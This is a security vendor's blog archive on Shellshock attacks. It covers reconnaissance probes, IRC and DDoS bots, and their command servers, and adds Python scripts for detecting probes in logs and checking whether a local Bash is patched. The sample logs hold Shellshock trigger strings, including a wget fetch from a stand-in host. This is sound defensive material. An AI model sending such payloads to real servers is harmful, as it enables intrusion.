TrendLabs Security Intelligence Blog

    Author Archive - Trend Micro




    Our coverage on the Bash bug vulnerability (more popularly known as “Shellshock”) continues as we spot new developments on Shellshock-related threats and attacks.

    Here is a list of our stories related to this threat:

     
Posted in Malware, Vulnerabilities


Sep 28, 6:27 am (UTC-7)

It seems the floodgates have truly opened for Shellshock-related attacks. We have reported on different attacks leveraging the Bash bug vulnerability, ranging from botnet attacks to IRC bots.

We have also mentioned that we spotted Shellshock exploit attempts in Brazil. It appears that these attempts were not limited to that country alone. We saw yet another Shellshock exploit attack, this time targeting a financial institution in China.

Trend Micro Deep Discovery was able to detect this attempt and found that the attackers were trying to see if several IPs owned by the institution were vulnerable to the Shellshock vulnerability, specifically CVE-2014-6271. Further analysis revealed that three of the tested IPs were possibly vulnerable, as the attackers tried to use the command “/bin/uname -a”. The command “uname” displays system information, including the OS platform, the machine type, and the processor information.

At first glance, retrieving system information might seem harmless. But as we mentioned before, such information-gathering could be a sign of preparation for more damaging routines. This one command could be the gateway to bigger, more damaging attacks.

    The timing of the attempts is quite interesting, given that Golden Week celebrations in China begin on October 1st. It’s very plausible that this attempt could be the initial phase of an attack that may occur during this holiday, as network administrators will be on leave at this time.

    Trend Micro continuously monitors attacks that may leverage the Bash vulnerability, while securing users and organizations from such real world threats. Trend Micro Deep Discovery provides network-wide visibility and intelligence to detect and respond to targeted attacks and advanced threats.

    Users are protected from this threat via our Smart Protection Network that detects the malware and blocks all related malicious URLs. Exploits abusing the Bash vulnerability, on the other hand, are detected via the following solutions:

    • Deep Discovery rule: 1618 – Shellshock HTTP REQUEST
    • DPI rule: 1006256 – GNU Bash Remote Code Execution Vulnerability
    • CVE-2014-6271-SHELLSHOCK_REQUEST detection
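As an added example that is not Trend Micro's own code or the logic of the rules listed above, the following Python script shows how a CVE-2014-6271 probe of the kind described in this post (an HTTP request carrying “/bin/uname -a”) can be picked out of web-server logs and separated from benign traffic. The log format, IP addresses and host name are constructed for the example, and the recon/payload split by the command's first token is a heuristic assumed here.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample log lines (not from the original post). Format:
# client_ip "request line" status "User-Agent" "Referer"
SAMPLE_LOG = """\
203.0.113.7 "GET /cgi-bin/status HTTP/1.1" 200 "() { :; }; /bin/uname -a" "-"
203.0.113.7 "GET /cgi-bin/status HTTP/1.1" 200 "Mozilla/5.0" "() { :;}; /bin/bash -c 'wget http://placeholder.invalid/x'"
198.51.100.4 "GET /index.html HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux)" "-"
198.51.100.9 "GET /cgi-bin/a.cgi?x=%28%29%20%7B%20%3A%3B%20%7D%3B%20id HTTP/1.1" 404 "curl/7.37.0" "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<req>[^"]*)" (?P<status>\d{3}) "(?P<ua>[^"]*)" "(?P<ref>[^"]*)"$'
)
# CVE-2014-6271 trigger: a function body "() { ... }" followed by ";" and a
# command, placed in a value the web server exports to a Bash child as an env var.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.*)")
# Heuristic (an assumption made here): these commands only gather information.
RECON_COMMANDS = {"uname", "id", "whoami", "hostname"}


def classify(cmd):
    """Label the injected command as recon or payload by its first token."""
    tokens = cmd.split()
    first = tokens[0].rsplit("/", 1)[-1] if tokens else ""
    return "recon" if first in RECON_COMMANDS else "payload"


def scan_log(text):
    """Return one hit per (line, field) carrying a Shellshock trigger."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production tool would count these
        for field in ("req", "ua", "ref"):
            value = unquote(m.group(field))  # attackers often URL-encode the trigger
            s = SHELLSHOCK_RE.search(value)
            if s:
                cmd = s.group("cmd").strip()
                hits.append({"ip": m.group("ip"), "field": field,
                             "command": cmd, "stage": classify(cmd)})
    return hits


def hits_per_source(hits):
    """Count probes per client IP, the view an analyst would triage first."""
    return dict(Counter(h["ip"] for h in hits))
```

Running `scan_log(SAMPLE_LOG)` flags the two recon probes and the one payload-fetch attempt while leaving the ordinary browser request alone.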

Users who want to check whether they are affected should check our free protection for Shellshock. We have also released a browser extension and device scanners to protect users’ browsers and devices against the risks posed by the Bash bug vulnerability. These tools can scan devices to detect whether they have been affected by the bug.
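The device scanners mentioned above check whether the installed Bash is affected. As an added example that is not Trend Micro's tool, this Python function performs the public CVE-2014-6271 self-test locally: it exports an environment variable shaped like a function definition with a trailing command and reports whether that trailing command ran. The variable and marker names are arbitrary choices for this example.

```python
import os
import shutil
import subprocess

# Marker that appears in the output only if the trailing command executed
# (arbitrary string chosen for this example).
MARKER = "SHELLSHOCK_MARKER_PRESENT"


def check_local_bash(bash_path=None):
    """Return "vulnerable", "patched" or "bash-not-found" for the local Bash.

    Public CVE-2014-6271 self-test: an environment variable whose value looks
    like an exported function definition followed by an extra command. An
    unpatched Bash runs the trailing command while importing the function;
    a patched Bash imports only the function (or ignores the variable), so
    the marker never reaches the output.
    """
    bash = bash_path or shutil.which("bash")
    if bash is None or not os.access(bash, os.X_OK):
        return "bash-not-found"
    env = dict(os.environ)
    # The variable name is arbitrary; only the shape of the value matters.
    env["SHELLSHOCK_PROBE"] = "() { :; }; echo " + MARKER
    try:
        result = subprocess.run(
            [bash, "-c", "echo probe-ran"],
            env=env, capture_output=True, text=True, timeout=10,
        )
    except (OSError, subprocess.TimeoutExpired):
        return "bash-not-found"
    if MARKER in result.stdout or MARKER in result.stderr:
        return "vulnerable"
    return "patched"


if __name__ == "__main__":
    print("local bash:", check_local_bash())
```

A patched Bash may print a warning about the ignored function definition; the check deliberately keys on the marker rather than on warnings, so it gives the same verdict across patch levels.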

    For more information on the Bash bug vulnerability, you may read our other articles:

    Users can also check out our online article, About the Shellshock Vulnerability: The Basics of the “Bash Bug”, for a quick and easy summary of what Shellshock actually is and why it’s such a big deal.

     



Given the severity of the Bash vulnerability, also known as Shellshock, it is no wonder that we are seeing a lot of attacks leveraging it. Just hours after this vulnerability was reported, malware payloads such as ELF_BASHLITE.A emerged in the threat landscape. Other payloads like PERL_SHELLBOT.WZ and ELF_BASHLET.A were also spotted in the wild; these have the capability to execute commands and can thus compromise a system or a server.

Apart from these malware payloads, DDoS attacks against well-known organizations have been reported. During the course of our investigation, we spotted exploit attempts in Brazil that test whether the target server is vulnerable. This means that the attackers behind such attempts are probably gathering intelligence. Once they have the information they need, they can launch subsequent attacks and, consequently, infiltrate their target network.

Our researchers are continuously monitoring possible attacks that may employ Shellshock. In the course of our investigation, we spotted an active IRC (Internet Relay Chat) bot that leveraged the Bash vulnerability. Trend Micro detects this bot as PERL_SHELLBOT.CE. Infected systems connect to an IRC server, us[dot]bot[dot]nu, via port 5190 and join the IRC channel #bash. The bot then waits for commands from a remote attacker. We analyzed the code and found that it has the capability to execute the following commands:

    • Perform DDoS attacks
      1. UDP
      2. TCP
      3. HTTP
    • IRC Booting/Disconnecting through CTCP, Message, Notice Flooding
    • Download Arbitrary File
    • Connect to Server (IP:Port)
    • Scan opened ports (<ip>)
    • Send E-mails (<subject>, <sender>, <recipient> <message>)
    • Ping IP (<ip>,<port>)
    • Resolve DNS <ip/host>
    • Check Bot Configuration

     


    Figure 1. PERL_SHELLBOT.CE infection diagram

So far, we have witnessed this bot issue the command to change channel. This is probably done as an evasion technique to avoid being taken down. As of this posting, we have seen more than 400 active bots join the IRC channel. We found that most of those who accessed the IRC server are located in the U.S., Japan, Canada, and Australia.

The threats and attack attempts, and now the emergence of a live IRC bot, clearly show the severity of this vulnerability and its real-world impact on users and enterprises. We will remain vigilant and be on the lookout for other attacks and threats. Stay tuned as we update this blog with new developments.

    For more information on Bash vulnerability, read our previous articles:

    With additional analysis from Alvin Bacani, Karla Agregado, and Mark Manahan. 

     
Posted in Malware, Vulnerabilities



We have another update regarding the Shellshock vulnerability. In a previous blog entry, we mentioned a DDoS attack against institutions that illustrated the gravity of the vulnerability’s real-world impact.

Based on our analysis, the backdoor used in this DDoS attack is somewhat related to the previous Shellshock exploits we have seen. It appears that the various payloads (PERL_SHELLBOT.WZ, ELF_BASHLITE.A, ELF_BASHLET.A) delivered by the Shellshock exploit code connect to several common C&C servers. By analyzing these servers, we managed to uncover more details on just how far-reaching this particular vulnerability is.

For those joining the fray just now, Shellshock is a vulnerability in the Bash shell, a user interface that allows users to access an operating system’s services through typed commands. In the wrong hands, Shellshock lets an attacker run malicious scripts on online systems and servers, compromising anything and everything in and connected to those systems. And make no mistake, this particular vulnerability has a lot of potential for widespread damage, as it affects systems running Linux, BSD, and Mac OS X.

We analyzed one of the C&C servers involved, 89[dot]238[dot]150[dot]154[colon]5, which is related to ELF_BASHLITE.SM and ELF_BASHLITE.A, and discovered that it is also used by ELF_BASHWOOP.A, yet another malware that we found to be involved in the attacks. ELF_BASHWOOP.A is the backdoor used in the botnet attacks against well-known organizations. The only difference is the port each connects to: ELF_BASHWOOP.A connects to port 9003, while ELF_BASHLITE.SM connects to port 5. Based on our findings, this particular C&C server is located in Great Britain.

    Another C&C server we analyzed, 162[dot]253[dot]66[dot]76[colon]53, is used by both ELF_BASHLITE.A and ELF_BASHLITE.SM. Our findings confirm that this C&C server is located in the United States.

    Below is the list of countries that accessed these C&C servers:


    Figures 1 & 2. Map and Table of C&C Servers

Note that the commands these malware can execute pertain to the control and termination of botnets, as well as to executing distributed denial of service (DDoS) attacks. We also found that they can flood IRC users with long messages on command, which can result in those users being disconnected. Some command examples include UDP and TCP flooding, terminating attack threads and botnets, and so on.

It should be stressed that the Shellshock vulnerability does not only affect servers and computers. We have been doing some testing of our own, and we confirm that the following are vulnerable to Shellshock:

    • Linux-based devices
    • Mac OS X devices
    • iPhone

We must issue a caveat here, however. While we confirm the latter two to be vulnerable, only Linux-based devices can be attacked remotely; Mac OS X devices and iPhones can only be attacked at a local level, i.e., when the attacker has physical access to the device itself. Apple’s statement about this matter, which declares that OS X users are safe from Shellshock if they have not configured their devices for advanced UNIX services, still holds true.

    Shellshock exploit attempts in Brazil

We have also begun to spot Shellshock exploit attempts in Brazil, which seem to be targeting government institutions. Trend Micro Deep Discovery is able to detect the intrusion:


    Figure 3. Trend Micro Deep Discovery discovers Shellshock attempt in Brazil

The attempt does not seem to have any real payload or do any real damage, but it collects what appears to be information about the systems it is trying to infiltrate. In the world of cybercrime and cyber attacks, however, that may change soon enough. We believe that the information-gathering could be a sign of preparation for a bigger, much more damaging attack.

    Trend Micro continuously monitors attacks that may leverage the Bash vulnerability, while securing users and organizations from such real world threats. Trend Micro Deep Discovery provides network-wide visibility and intelligence to detect and respond to targeted attacks and advanced threats.

    Readers of the Security Intelligence Blog can rest assured that we will continue to cover this threat and provide timely updates as we get them.

    For more information regarding Shellshock, you can check out our previous articles:

    Users can also check out our online article, About the Shellshock Vulnerability: The Basics of the “Bash Bug”, for a quick and easy summary of just what Shellshock actually is, and why it’s such a big deal.

     
Posted in Exploits, Malware, Vulnerabilities


Sep 26, 2:01 pm (UTC-7)

One of the implications of the Bash Bug vulnerability, also referred to as Shellshock, is that cybercriminals and attackers can use it to launch DDoS attacks against enterprises and large organizations. True enough, there are already reports of botnet attacks against certain institutions that employed the vulnerability. A botnet is a network of infected computers or systems.

    Based on our investigation, the backdoor (which Trend Micro detects as ELF_BASHWOOP.A) launches the following commands:

    • kill
    • udp
    • syn
    • tcpamp
    • dildos
    • http
    • mineloris

In addition, it connects to the C&C server 89[DOT]238[DOT]150[DOT]154 to receive commands. Note that this is the same C&C server used by ELF_BASHLITE.A, the malware we initially saw as the payload of the Bash exploit. The related hash for the said threat is 96498e53200cfb3947cbd5357f6833a1d0605360.

Earlier, we spotted several malware payloads of the exploit code for the Bash vulnerability, which Trend Micro detects as:

Users are protected from this threat via the Smart Protection Network, which detects the malware and blocks all related malicious URLs. For the Bash bug vulnerability, Trend Micro provides protection via the following solutions:

    • Deep Discovery rule: 1618 – Shellshock HTTP REQUEST
    • DPI rule: 1006256 – GNU Bash Remote Code Execution Vulnerability

    For more information on the Bash bug vulnerability, you can refer to the following blog entries:

Users can also read our article, About the Shellshock Vulnerability: The Basics of the “Bash Bug”, for details on the vulnerability and the risks it poses to users and organizations.

    We’ll continuously update this blog entry for new findings.

     
Posted in Exploits, Malware, Vulnerabilities


     
